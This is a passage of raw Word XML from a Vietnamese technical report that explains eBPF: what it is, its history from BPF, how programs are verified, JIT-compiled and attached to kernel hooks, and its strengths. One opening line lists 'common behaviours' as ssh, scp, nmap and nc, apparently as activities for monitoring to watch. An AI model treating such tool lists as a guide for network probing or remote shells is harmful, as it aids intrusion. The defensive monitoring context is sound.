        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Các hành vi thường gặp: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>ssh / scp / nmap / nc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_heading=h.y8d5ymisd40j" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkStart w:id="22" w:name="_Toc1870125869"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>CÔNG CỤ eBPF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_heading=h.3yg8blud3nvo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkStart w:id="24" w:name="_Toc1816952761"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>KHÁI NIỆM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Extended Berkeley Packet Filter (eBPF) là công nghệ mã nguồn mở cho phép các chương trình nhỏ dạng bytecode trực tiếp trong Linux kernel qua môi trường sandbox có kiểm soát mà không cần sửa mã nguồn kernel hoặc nạp kernel module.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l "tailieuthamkhao2" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thay vì can thiệp trực tiếp vào kernel thì eBPF cho phép gắn các chương trình vào những hook points (một vị trí hay sự kiện cụ thể trong kernel mà eBPF program có thể gắn vào theo dõi hoặc xử lý) cụ thể trong kernel. Khi sự kiện liên quan xảy ra thì sẽ kích hoạt điều kiện liên quan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Cơ chế Verifier bắt buộc mọi chương trình eBPF đều phải qua cơ chế này, đảm bảo không gây crash kernel, không truy cập trái phép bộ nhớ và không có vòng lặp vô hạn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_heading=h.45jmbektxzs3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkStart w:id="26" w:name="_Toc612578437"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>LỊCH SỬ PHÁT TRIỂN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_heading=h.fe2scwcw0c46" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>BPF (1992)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Được phát triển với mục đích lọc và xử lý gói tin mạng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>32 bit - ít thanh ghi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hook points vào network packet path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Phạm vi sử dụng trong networking filtering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Verifier còn hạn chế.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_heading=h.6v57vlyhmpe7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>eBPF (2014)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Được mở rộng và tùy biến xử lý tại nhiều điểm trong kernel:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>64 bit - 11 thanh ghi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hook points vào đa dạng điểm trong kernel: syscall, network, tracing …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Verifier phức tạp, phân tích tĩnh để kiểm tra mọi nhánh có thể xảy ra nhằm đảm bảo chương trình luôn kết thúc và an toàn bộ nhớ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ứng dụng trong nhiều phạm vi không chỉ networking mà observability, security, performance,...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_heading=h.rc0luv488ohv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkStart w:id="30" w:name="_Toc108182361"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>LUỒNG HOẠT ĐỘNG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Bước 1: Viết và biên dịch chương trình eBPF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Viết chương trình bằng C/Rust/bpftrace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Biên dịch bằng LLVM/Clang để tạo thành eBPF bytecode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Bước 2: Nạp chương trình vào kernel qua lời gọi BPF syscall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Bước 3: Verifier, đây là bước kiểm tra bytecode để đảm bảo an toàn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Bước 4: Tối ưu JIT và gắn Hook points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Trình biên dịch JIT chuyển đổi bytecode thành tập lệnh máy đặc thù của phần cứng để đảm bảo tốc độ thực thi tương đương native code trong kernel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Mã lệnh được gắn vào hook points như system call, kernel tracepoint,...để bắt đầu theo dõi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Bước 4: Thực thi khi sự kiện xảy ra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Chương trình sẽ tự động chạy mỗi khi sự kiện tương ứng xảy ra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Cơ chế eBPF Maps giúp trao đổi dữ liệu với user space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các cơ chế đặc biệt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Verification: hoạt động như bộ kiểm tra an toàn trước khi cho phép chương trình thực thi trong kernel dựa trên các điều kiện: quyền hạn (phải được cấp quyền), An toàn hệ thống (không crash hay làm hỏng hệ thống), Kết thúc hữu hạn (không chứa vòng lặp vô tận làm treo hệ thống).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>JIT Compilation thực hiện dịch bytecode sang mã máy native của CPU hiện tại, giúp chương trình chạy nhanh ngang với kernel code được biên dịch sẵn hoặc kernel module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Maps là cơ chế chia sẽ dữ liệu giữa eBPF program trong kernel và user space application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_heading=h.878bf6srmxyj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkStart w:id="32" w:name="_Toc937551007"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>ĐIỂM MẠNH VÀ ĐIỂM YẾU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_heading=h.qaw4kvjjrrri" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Điểm mạnh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Công cụ eBPF an toàn cho hệ thống nhờ cơ chế Verifier, trước khi thực thi thì mọi chương trình đều phải trải qua cơ chế này để kiểm tra an toàn, từ đó tránh được các hành vi truy cập trái phép bộ nhớ, vòng lặp vô hạn hay lỗi logic nghiêm trọng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
